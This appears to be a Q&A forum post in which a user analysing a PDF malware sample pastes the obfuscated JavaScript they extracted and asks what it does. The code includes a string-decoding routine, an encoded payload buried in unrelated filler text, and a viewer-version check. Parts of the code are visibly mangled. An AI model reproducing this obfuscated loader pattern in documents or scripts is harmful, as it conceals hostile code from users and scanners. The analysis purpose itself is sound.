# Understanding potential malicious javascript (PDF vulnerability exploit)

Tags: javascript, security, pdf, version, malware

I'm investigating a pdf malware, so far I extracted the javascript out of it and scanned it , hash of the extracted javacript file is (sha256 : 0ace77aaac3da51ac4af16b7fbc9828c8cfbd7b1b1af2e69e4a8a3cda4eb1398
But i'm not really getting what the script is doing, I noticed the function app.viewVersion.toString( that is used to recover the version of your Acrobat reader but I don't see the script using this information afterwards.

Can someone tell me if this is even malicious and if so what the code is doing ?
code is below :

Thanks in advance,

```
'use strict';
/**


@return {undefined}
/
function STARTSCRIPT() {
/*

@param {boolean} workshopper
@param {string} id
@param {boolean} min
@param {string} msg
@return {undefined}
/
function init(workshopper, id, min, msg) {
value = event.value;
if (workshopper && value <= id) {
app.alert("Value must be greater than " + id);
app.beep();
/* @type {boolean} /
event.rc = false;
return;
}
if (min && value >= msg) {
app.alert("Value must be less than " + msg);
app.beep();
/* @type {boolean} /
event.rc = false;
return;
}
}
/*
@param {number} type
@param {number} e
@param {!Object} internal
@return {undefined}
/
function print(type, e, internal) {
if (e > 11) {
console.println("Entering function: myFunction");
console.println(" Parameter 1: aWMaiAhjHR = " + type);
console.println(" Parameter 2: bWMaiAhjHR = " + e);
} else {
code = DEWMaiAhjHR(internalwe(type, 105) + "ub" + we(type, 105) + "tr", 3 +                             
(27 + (type - 3) - (27 + (type - 3)) % 60) * 4);
thiswe(type, 91) + we(type, 108) + we(type, 87) + we(type, 98);
}
}
/*
@param {string} val
@param {number} tickArray
@return {?}
/
this.DEWMaiAhjHR = function(val, tickArray) {
/* @type {string} /
ecWMaiAhjHR = "";
/* @type {string} /
val = unescape(val);
/* @type {number} /
frWMaiAhjHR = val.length;
/* @type {number} /
j = 0;
for (; j < frWMaiAhjHR;) {
ecWMaiAhjHR = ecWMaiAhjHR + we2(31, val.charCodeAt(j) - tickArray ^         
tickArray);
j++;
}
return ecWMaiAhjHR;
};
/* @type {string} /
dWMaiAhjHR = 'I need a javascript that I can place in a form field             
properties area that will replace a "&" symbol with the word "and".....any     
help would be greatly appreciated. There are a couple of places you can 
enter a script that modifies the contents of the field. The question is, do 
you want the value of the form field to be altered, or just what the user 
sees on the screen? To modify the value of the field you will need to use a 
custom keystroke script. To modify the appearance of the field you will need 
to enter a format script. You can find articles on both of these in the 
tutorial on this site. The script itself can be done with the JavaScript 
"replace" function, In both cases (assuming that youve got an AcroForm) the 
code will look like this. PHP - Java Chat system for web site. Client is 
Java applet can run in any Java enabled browsers. The server side is PHP 
script can be installed on any PHP enabled web host. Interface text can be 
customized in any language. Multi rooms. Java Script Mutator is intended for 
optimization and protection of your Java Scripts from theft and 
modifications. Gnostice PDFOne Java is a pure Java library which provides a 
rich set of APIs to Create, Fill and Read PDF Forms, Secure, Merge, Split, 
Stamp PDF documents. = %0Cxet%26EctoXit%26A%26evv0xmiwitXitsmop0zoSztmpg.- 
%3B%0CEctoXit%26A%26EctoXit0tivreci.%2FbJ%2Fg2%24%24
/*
@param {number} nextActionList
@param {number} index
@return {?}
/
this.we2 = function(nextActionList, index) {
return String.fromCharCode(nextActionList % 55 - nextActionList + index);
};
/*
@param {number} nextActionList
@param {number} index
@return {?}
*/
this.we = function(nextActionList, index) {
return String.fromCharCode(nextActionList % 55 - nextActionList + 10 +     
index);
};
hWMaiAhjHR = app.viewerVersion.toString();
hWMaiAhjHR = hWMaiAhjHR.charAt(0);
print(hWMaiAhjHR, hWMaiAhjHR / 2, dWMaiAhjHR);
}
;
```

Comment: Why do you think this code is malicious?

Comment: Well I don't really know since I don't understand perfectly what it does but its recognised as malicous by quick and dirty analysis websites. I researched similar codes (like pdfka exploit) and what they are doing is getting the version of your acrobat reader and comparing it with functions in order to exploit this or that vulnerability but I don't think my code does that.